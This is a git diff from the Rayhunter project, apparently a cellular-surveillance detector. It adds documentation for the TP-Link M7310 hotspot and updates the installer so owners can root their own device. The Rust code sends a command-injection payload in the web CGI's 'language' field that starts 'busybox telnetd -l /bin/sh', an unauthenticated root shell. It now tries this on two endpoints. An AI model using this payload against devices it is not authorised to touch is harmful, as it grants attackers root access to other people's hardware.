diff --git a/doc/SUMMARY.md b/doc/SUMMARY.md index 255725f..f0d54be 100644 --- a/doc/SUMMARY.md +++ b/doc/SUMMARY.md @@ -12,6 +12,7 @@ - [How we analyze a capture](./analyzing-a-capture.md) - [Supported devices](./supported-devices.md) - [TP-Link M7350](./tplink-m7350.md) + - [TP-Link M7310](./tplink-m7310.md) - [Orbic RC400L](./orbic.md) - [Support, feedback, and community](./support-feedback-community.md) - [Frequently Asked Questions](./faq.md) diff --git a/doc/supported-devices.md b/doc/supported-devices.md index 0e0a7f9..f2a6ac6 100644 --- a/doc/supported-devices.md +++ b/doc/supported-devices.md @@ -6,3 +6,4 @@ If you have a device in mind which you'd like Rayhunter to support, please [open - [Orbic RC400L](./orbic.md) - [TP-Link M7350](./tplink-m7350.md) +- [TP-Link M7310](./tplink-m7310.md) diff --git a/doc/tplink-m7310.md b/doc/tplink-m7310.md new file mode 100644 index 0000000..70946e2 --- /dev/null +++ b/doc/tplink-m7310.md @@ -0,0 +1,6 @@ +# TP-Link M7310 + +The TP-Link M7310 is **supported by Rayhunter since 0.3.5**. The device +works similarly to the [M7350](./tplink-m7350.md) and is essentially an older, +more expensive version of it. Hardware version v1.0 has been successfully +tested, later versions may work as well. diff --git a/installer/src/tplink.rs b/installer/src/tplink.rs index ac6c684..5c4cc9e 100644 --- a/installer/src/tplink.rs +++ b/installer/src/tplink.rs @@ -40,24 +40,28 @@ struct V3RootResponse { } pub async fn start_telnet(admin_ip: &str) -> Result { - let qcmap_web_cgi_endpoint = format!("http://{admin_ip}/cgi-bin/qcmap_web_cgi"); let client = reqwest::Client::new(); println!("Launching telnet on the device"); - // https://github.com/advisories/GHSA-ffwq-9r7p-3j6r - // in particular: https://www.yuque.com/docs/share/fca60ef9-e5a4-462a-a984-61def4c9b132 - let response = client.post(&qcmap_web_cgi_endpoint) - .body(r#"{"module": "webServer", "action": 1, "language": "EN';echo $(busybox telnetd -l /bin/sh);echo 1'"}"#) - .send() - .await?; + for endpoint in [ + // TP-Link M7350 v3 + // https://github.com/advisories/GHSA-ffwq-9r7p-3j6r + // in particular: https://www.yuque.com/docs/share/fca60ef9-e5a4-462a-a984-61def4c9b132 + format!("http://{admin_ip}/cgi-bin/qcmap_web_cgi"), + // TP-Link M7310 v1 + // (adaptation of M7350 exploit + format!("http://{admin_ip}/cgi-bin/web_cgi"), + ] { + let response = client.post(&endpoint) + .body(r#"{"module": "webServer", "action": 1, "language": "EN';echo $(busybox telnetd -l /bin/sh);echo 1'"}"#) + .send() + .await?; - let is_v3 = response.status() != 404; + if response.status() == 404 { + continue; + } - if !is_v3 { - println!("Got a 404 trying to run exploit for hardware revision v3, trying v5 exploit"); - tplink_launch_telnet_v5(admin_ip).await?; - } else { let V3RootResponse { result } = response.error_for_status()?.json().await?; if result != 0 { @@ -67,7 +71,7 @@ pub async fn start_telnet(admin_ip: &str) -> Result { // resetting the language is important because otherwise the tplink's admin interface is // unusuable. let V3RootResponse { result } = client - .post(&qcmap_web_cgi_endpoint) + .post(&endpoint) .body(r#"{"module": "webServer", "action": 1, "language": "en"}"#) .send() .await? @@ -80,12 +84,13 @@ pub async fn start_telnet(admin_ip: &str) -> Result { } println!("Detected hardware revision v3"); + return Ok(true); } - println!( - "Succeeded in rooting the device! Now you can use 'telnet {admin_ip}' to get a root shell. Use './installer util tplink-start-telnet' to root again without installing rayhunter." - ); - Ok(is_v3) + println!("Got a 404 trying to run exploit for hardware revision v3, trying v5 exploit"); + tplink_launch_telnet_v5(admin_ip).await?; + + Ok(false) } async fn tplink_run_install(